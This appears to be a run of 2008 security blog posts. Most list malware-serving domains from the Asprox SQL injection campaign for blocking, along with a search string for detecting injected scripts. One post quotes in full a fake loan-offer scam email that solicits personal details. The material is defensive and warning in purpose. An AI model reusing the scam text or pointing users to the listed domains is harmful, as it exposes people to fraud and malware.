Asprox domains: 3/7/08 and ngg.js

The Asprox domains used in the current round of SQL Injection attacks have shifted again, the ones to check for or block are:

• adwadb.mobi
• allocbn.mobi
• canclvr.com
• catdbw.mobi
• ktrcom.com
• lokriet.com
• mainbvd.com
• portwbr.com
• stiwdd.com
• testwvr.com
  
• upcomd.com
• ucomddv.com
  

The malicious javascript file has also changed to ngg.js (usually it is b.js or m.js or similar). If you're using Google Alerts or similar to monitor your own site or sites of interest, you might want to change the search string to something like "script src=http:" .js site:oceanic-air.com (replace the domain name with the site you want to monitor).

Asprox domains: 2/7/08

These seem to be the currently active domains used in the Asprox SQL Injection attack. Registrar of choice at the moment is Vivids Media GMBH (if they really exist) via Directi Internet Solutions (publicdomainregistry.com).

• adupd.mobi
• adwste.mobi
• bnrupdate.mobi
• cntrl62.com
• config73.com
• cont67.com
• csl24.com
• debug73.com
• default37.com
• get49.net
• pid72.com
• pid76.net
• web923.com

Best advice to to block access to these sites and check your logs.

"Royal Alliance Financial Investment" scam

A slightly strange scam from some outfit pretending to be "Royal Alliance Financial Investment" offering a low-cost loan. The initial email does not ask for much in the way of personal data, presumably that comes as the next step.

There is no such company as "Royal Alliance Financial Investment" in the UK. Originating IP is 196.216.69.54 which is allocated to Swift Global Kenya Limited in Nairobi. Finance companies do not generally use free email accounts to solicit business, and the address is clearly wrong. Avoid.

---

From: "Royal Alliance Financial Investment"
Date: Mon, June 30, 2008 3:43 pm


Royal Alliance Financial Investment
(Financial Aid Professionals)
Contant Address:85 Fleet Street.
London EC4Y 1AE.
Manchester United Kingdom.


Are you searching for a Genuine loan? at an affordable interest rate ?
processed within 4 to 6 working days. Have you been turned down constantly
by your Banks and other financial institutions? The goodnews is here !!!

Welcome to Royal Alliance Financial Investment,interest rate at 3%.It
gladdens our
hearts to bring to your notice that we offer all kinds of loan to any
part of the world.Being a licensed and registered company under the
finance ministry here in the United Kingdom we make available to customers
legitimate loan offers that are quick and affordable with interest rate at
a mere 3%.

Our Packages include:*Home Loan *Auto Loan*Mortgage Loan*Business
Loan*International Loan*Personal Loan*And Much More.

Please if you are delighted and interested in our financial offer,Do not
hesitate to contact us if in need of our service as you will be required
to furnish us with the following details to commence with the process of
your loan sum accordingly

1st INFORMATIONS NEEDED ARE

First Name:___________________________
Last Name:____________________________
Gender:_______________________________
Marital status:_______________________
Contact Address:______________________
City/Zip code:________________________
Country:______________________________
Date of Birth:________________________
Amount Needed as Loan:________________
Loan Duration:________________________
Monthly Income/Yearly Income:_________
Occupation:___________________________
Business name:________________________
Purpose for Loan:_____________________
Phone:________________________________
Fax:__________________________________


Thanks For Your Patronage!


'Your Business Is Our Blessing'

Mr,Jerry Mccarthy,
London Operations Manager,
Contant Address:85 Fleet Street.
London EC4Y 1AE.
Manchester United Kingdom.
Email:royalalliance.finance02@gmail.com
visit.royalalliance@gmail.com

---

Asprox: new domains including .mobi

Another set of domains used in the Asprox SQL Injection attack: bnrupdate.mobi, adwste.mobi, adupd.mobi, hlpgetw.com, hdadwcd.com, rid34.com, adwsupp.com,supbnr.com, suppadw.com, dl251.com, aspx49.com, kadport.com, tid62.com, and batch29.com.

It's the first time that I've seen .mobi used in this way. Blocking access to all .mobi domains will probably do little harm.

Asprox: list of domains and mitigation steps

The folks over at Bloombit Software have a useful article called ASCII Encoded/Binary String Automated SQL Injection Attack which explains some of the technical details behind these attacks and also has another list of domains serving up malware which is useful to keep an eye on.

Asprox: app52.com, aspssl63.com, update34.com, appid37.com, asp707.com, westpacsecuresite.com

Another bunch of domains coming up in the latest batch of Asprox SQL Injection attacks: app52.com, aspssl63.com, update34.com, appid37.com, asp707.com, westpacsecuresite.com - check your logs for these.

Microsoft Security Advisory (954462) - Rise in SQL Injection Attacks Exploiting Unverified User Data Input

A timely advisory from Microsoft on SQL Injection attacks plus some tools to help secure your setup are available on KB954462 with more information here and ISC's commentary here.

Of particular interest is the free Scrawlr tool available from HP. That could be a useful way to see if your server is vulnerable before the bad guys find it,